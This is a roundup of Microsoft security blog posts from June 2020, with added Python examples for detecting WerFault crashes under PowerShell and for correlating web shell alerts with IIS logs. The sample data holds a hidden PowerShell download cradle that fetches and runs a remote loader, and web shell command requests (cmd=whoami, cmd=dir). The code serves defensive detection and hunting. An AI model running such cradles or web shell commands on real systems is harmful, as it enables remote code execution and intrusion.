Microsoft Security Saturday – 6/13/2020

Blue teams helping red teams: A tale of a process crash, PowerShell, and the MITRE ATT&CK evaluation
Microsoft Threat Protection automatically detected the execution of the reflective loader via PowerShell; however, during the execution of this attack, the telemetry provided by the product also captured the launch of the WerFault.exe process (the Windows Error Reporting process) forked from PowerShell.exe, which was a sign of a crashing process.
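The detection idea in that post, an unexpected WerFault.exe child of a scripting host, is small enough to show over sample telemetry. The block below is an added example and not code from the Microsoft post or product: the event records are constructed to mirror a few fields of a process-creation event (the advanced hunting DeviceProcessEvents columns FileName, ProcessCommandLine, InitiatingProcessFileName and InitiatingProcessCommandLine are the real-world analogue), the list of "suspect" parents and the assumed `WerFault.exe -u -p <pid> -s <handle>` command-line shape are assumptions, and it generalizes the post's single PowerShell case to any scripting or LOLBin host.

```python
"""Added example: flag WerFault.exe launched by a scripting host (crash as a
signal). Records, field names and the suspect-parent list are assumptions."""
import re
from dataclasses import dataclass
from typing import Optional

# Parents for which a WerFault.exe child is unexpected and worth a look.
# Assumption: tune this list per environment; it is not a vendor list.
SUSPECT_PARENTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Assumed command-line shape: "WerFault.exe -u -p <pid> -s <handle>", where
# -p names the faulting process. Only the -p argument is parsed here.
_PID_RE = re.compile(r"-p\s+(\d+)")


@dataclass(frozen=True)
class ProcessEvent:
    device: str
    file_name: str            # image name of the created process
    command_line: str
    parent_file_name: str     # image name of the initiating (parent) process
    parent_command_line: str
    parent_pid: int


def werfault_crash_pid(command_line: str) -> Optional[int]:
    """Return the faulting PID named by a WerFault.exe command line, or None."""
    m = _PID_RE.search(command_line)
    return int(m.group(1)) if m else None


def suspicious_werfault(events):
    """Return one finding per WerFault.exe event whose parent is a suspect host.

    The parent's command line is recorded because that is usually where the
    payload (encoded command, download cradle) lives; pid_matches_parent
    confirms WerFault is reporting on the parent itself rather than another
    process."""
    findings = []
    for e in events:
        if e.file_name.lower() != "werfault.exe":
            continue
        if e.parent_file_name.lower() not in SUSPECT_PARENTS:
            continue
        crashed = werfault_crash_pid(e.command_line)
        findings.append({
            "device": e.device,
            "parent": e.parent_file_name,
            "parent_command_line": e.parent_command_line,
            "crashed_pid": crashed,
            "pid_matches_parent": crashed == e.parent_pid,
        })
    return findings


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    # A crash inside a hidden PowerShell download cradle: this is the signal.
    ProcessEvent("ws01", "WerFault.exe",
                 r"C:\Windows\System32\WerFault.exe -u -p 4120 -s 1808",
                 "powershell.exe",
                 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                 ".DownloadString('http://example.invalid/loader.ps1')\"",
                 4120),
    # A browser renderer crash: ordinary noise, not flagged.
    ProcessEvent("ws01", "WerFault.exe",
                 r"C:\Windows\System32\WerFault.exe -u -p 3016 -s 776",
                 "chrome.exe",
                 r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',
                 3016),
    # WER service activity: not flagged.
    ProcessEvent("ws02", "WerFault.exe",
                 r"C:\Windows\System32\WerFault.exe -u -p 2200 -s 900",
                 "svchost.exe", "svchost.exe -k WerSvcGroup", 1500),
    # PowerShell spawning something other than WerFault: not this rule's job.
    ProcessEvent("ws02", "conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0x4",
                 "powershell.exe", "powershell.exe", 5000),
]

if __name__ == "__main__":
    for f in suspicious_werfault(SAMPLE_EVENTS):
        print(f)
```

Run as-is it prints the single finding from ws01; in production the same filter is a one-line where clause over process-creation telemetry, with the parent command line carried along as the pivot for the investigation.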

Deliver a Security Score weekly briefing
By leveraging the Get-SecureScoreData Logic App, you can export the Secure Score and control details as daily snapshots into a Log Analytics workspace. With the historical data being kept, we can build dashboards, search through it, do advanced triggering on multiple recommendations, and even build end-of-month forecasted scores using time series insights.

Top 4 tips to protect your remote workforce with data compliance in OneDrive
Read on to learn how Microsoft 365 and OneDrive help keep your data secure and private while at the same time reducing the stress on IT during compliance or litigation issues.

Azure AD Mailbag: Frequent questions about using device-based Conditional Access for remote work
Lately, we’re seeing more customers implementing device-based Conditional Access (a way of configuring Conditional Access policy) and Hybrid Azure AD Join to enable secure remote work. Our Azure AD Devices team would like to share best practices and tips that we’ve assembled while working closely with customers.

Announcing general availability of Microsoft Information Protection in Power BI
Today we are excited to announce the general availability of Microsoft Information Protection’s sensitivity labels in Power BI. The same sensitivity labels you use to classify and label data in Microsoft 365 apps (e.g. Excel) can now be used to classify and label sensitive data in the Power BI service too.

The science behind Microsoft Threat Protection: Attack modeling for finding and stopping evasive ransomware
To provide security teams with the visibility and solutions to fight cyberattacks, Microsoft Threat Protection (MTP) correlates threat signals across multiple domains and point solutions, including endpoints, identities, data, and applications. This comprehensive visibility allows MTP to coordinate prevention, detection, and response across your Microsoft 365 data.

Web shell threat hunting with Azure Sentinel and Microsoft Threat Protection
In this blog we use Azure Sentinel to enrich the investigation of endpoint web shell alerts from Microsoft Defender Advanced Threat Protection (MDATP) by correlating them with additional data sources, such as W3CIISLog (the IIS web server logs).
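The correlation that post performs in Sentinel (an MDATP web shell alert joined to IIS requests on the same host around the alert time) can be shown end to end over a small constructed data set. The block below is an added example, not code from the Microsoft post: the alert, the IIS log text in standard W3C extended format, the `SITE_ROOTS` mapping from the site's physical root to its URL root (in reality taken from the IIS configuration) and the 24-hour window are all assumptions. It also covers two details a hunter needs: the on-disk path of the shell has to be translated into the cs-uri-stem IIS logs, and IIS URL matching is case-insensitive, so a request for `/uploads/IMG.aspx` hits the same shell as `/uploads/img.aspx`.

```python
"""Added example: enrich a web shell alert with the IIS requests that reached
the shell. Alert, log lines, site-root mapping and window are constructed."""
from collections import Counter
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Assumed site layout: physical root -> URL root, per server.
SITE_ROOTS = {"web01": {r"C:\inetpub\wwwroot": "/"}}


def path_to_uri_stem(device, file_path):
    """Translate the shell's on-disk path into the cs-uri-stem IIS would log."""
    p = PureWindowsPath(file_path)
    for root, url_root in SITE_ROOTS.get(device, {}).items():
        try:
            rel = p.relative_to(PureWindowsPath(root))
        except ValueError:
            continue  # file is not under this site's root
        return url_root.rstrip("/") + "/" + rel.as_posix()
    return None


def parse_w3c_log(text):
    """Parse W3C extended log text using its own #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # #Software / #Version / #Date directives
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"field count mismatch: {line!r}")
        rows.append(dict(zip(fields, values)))
    return rows


def requests_to_shell(alert, iis_log_text, window=timedelta(hours=24)):
    """Return requests to the alerted shell within +/- window of the alert,
    grouped by client IP, plus the earliest hit (a lower bound on dwell)."""
    stem = path_to_uri_stem(alert["device"], alert["file_path"])
    if stem is None:
        return {"uri_stem": None, "hits": [], "by_client": {}, "first_seen": None}
    stem = stem.lower()
    lo, hi = alert["time"] - window, alert["time"] + window
    hits = []
    for r in parse_w3c_log(iis_log_text):
        when = datetime.fromisoformat(f"{r['date']}T{r['time']}")
        if r["cs-uri-stem"].lower() == stem and lo <= when <= hi:
            hits.append({**r, "when": when})
    return {
        "uri_stem": stem,
        "hits": hits,
        "by_client": dict(Counter(h["c-ip"] for h in hits)),
        "first_seen": min((h["when"] for h in hits), default=None),
    }


# Constructed alert, as an MDATP web shell alert might surface it.
SAMPLE_ALERT = {
    "device": "web01",
    "time": datetime(2020, 6, 10, 9, 45, 0),
    "file_path": r"C:\inetpub\wwwroot\uploads\img.aspx",
}

# Constructed IIS log (default W3C field layout, IPs from documentation ranges).
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-06-10 08:12:03 10.0.0.5 GET /index.aspx - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 15
2020-06-10 09:41:10 10.0.0.5 POST /uploads/img.aspx - 443 - 198.51.100.23 python-requests/2.23.0 - 200 0 0 210
2020-06-10 09:41:25 10.0.0.5 POST /uploads/img.aspx cmd=whoami 443 - 198.51.100.23 python-requests/2.23.0 - 200 0 0 180
2020-06-10 09:55:02 10.0.0.5 GET /uploads/IMG.aspx - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 30
2020-06-12 01:00:00 10.0.0.5 POST /uploads/img.aspx cmd=dir 443 - 198.51.100.23 curl/7.68.0 - 200 0 0 100
"""

if __name__ == "__main__":
    result = requests_to_shell(SAMPLE_ALERT, SAMPLE_IIS_LOG)
    print(result["uri_stem"], result["by_client"], result["first_seen"])
```

The three hits inside the window (two POSTs from 198.51.100.23, one case-variant GET from 203.0.113.7) are the pivots for the next step: those client IPs and the `cmd=` query strings are what you chase through proxy and firewall logs, while the 12 June request falls outside the window and would only show up after widening it.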

11 security tips to help stay safe in the COVID-19 era
As we spend more time online, it’s important to remember that the basics of online safety have not changed. These guidelines provide a strong foundation for digital security, but as we think about the “new normal” and how the internet is woven into the fabric of our lives, extra steps may be necessary to further reduce risk.

Getting started with Insider Risk Management
Insider risk management is a solution in Microsoft 365 that helps minimize internal risks by enabling you to detect, investigate, and take action on risky activities in your organization. Custom policies allow you to detect and take action on malicious and inadvertent risk activities in your organization, including escalating cases to Microsoft Advanced eDiscovery if needed.

Records Management Webinar
Records management in Microsoft 365 helps an organization manage its legal obligations, provides the ability to demonstrate compliance with regulations, and increases efficiency with regular disposition of items that are no longer required to be retained, no longer of value, or no longer required for business purposes.

Building trust into digital experiences with decentralized identities (DID)
Today, I’d like to highlight some really significant progress in two important open standards efforts: Verifiable Credentials and Decentralized Identifiers. We view these two standards as being key foundational elements in our efforts to enable privacy preserving, trustworthy identity for everyone.

Give your HR and IT teams more reasons to cheer with improved integration between Workday & Azure AD
Recently, we announced a strategic partnership with Workday that will bring more integrations for our joint customers. Today, we’d like to highlight three enhancements we’ve recently made in the Azure AD Workday integration.

“Why are my users not prompted for MFA as expected?”
We’re going beyond MFA, too, where the idea is to not even require a password anymore – use other technologies to make sign-ins easier AND more secure – at the same time. For example, below, our ‘passwordless sign-in’ capability sends a prompt to the PC with a number, then moments later, the MS Authenticator app on a mobile device prompts for a number-match, followed by a biometric.

Azure Sentinel Agent: Collecting from servers and workstations, on-prem and in the cloud
To collect events from servers wherever those are deployed, use the Azure Log Analytics agent (also called “MMA” for Microsoft Monitoring Agent). The agent supports collecting from Windows machines as well as Linux.

Azure Security Center Auto-connect to Sentinel
In this blog post I will introduce a way to automate inclusion of new Azure Security Center subscriptions into Azure Sentinel; more specifically, any new subscription in the organization will stream Azure Security Center alerts to Sentinel.

How to respond to potential Malware uploaded to Azure Storage Blob
Azure Security Center covers a wide range of Cloud Workload Platform Protection (CWPP) capabilities when it comes to protecting Platform as a Service. One of those capabilities is alerting on potential malware uploaded as a blob to an Azure Storage account.

MIP and Compliance V-blog #2: Setting up a secure collaboration environment – End user point of view
Last week we showed you how to set up a secure collaboration environment to ensure that communications within and external to your environment are secured. This week, we change course and look at this environment from the end user’s point of view. Two users on the acquisitions team for project BASOS need to work with each other, and also collaborate with the CEO of the “to be acquired” company.

Sending alerts enriched with supporting events from Azure Sentinel to 3rd party SIEMs
In this blog post we will introduce a solution which uses Logic Apps to automatically attach evidence to Azure Sentinel alerts and send them to an Event Hub that can be consumed by a 3rd party SIEM solution.

Protecting your GitHub assets with Azure Sentinel
There are multiple features to help you secure your GitHub organization, but in this blog we will introduce a solution which uses Logic Apps to pull GitHub audit logs & ingest them into Sentinel.

Misconfigured Kubeflow workloads are a security risk
Azure Security Center monitors and defends thousands of Kubernetes clusters running on top of Azure Kubernetes Service. In this blog, we’ll reveal a new campaign that was observed recently by ASC that targets Kubeflow, a machine learning toolkit for Kubernetes.

Barracuda and Microsoft: Removing security barriers to faster public cloud adoption
To quickly and successfully move to public cloud, organizations need to deploy advanced network security solutions that are tightly integrated with the major public cloud platforms.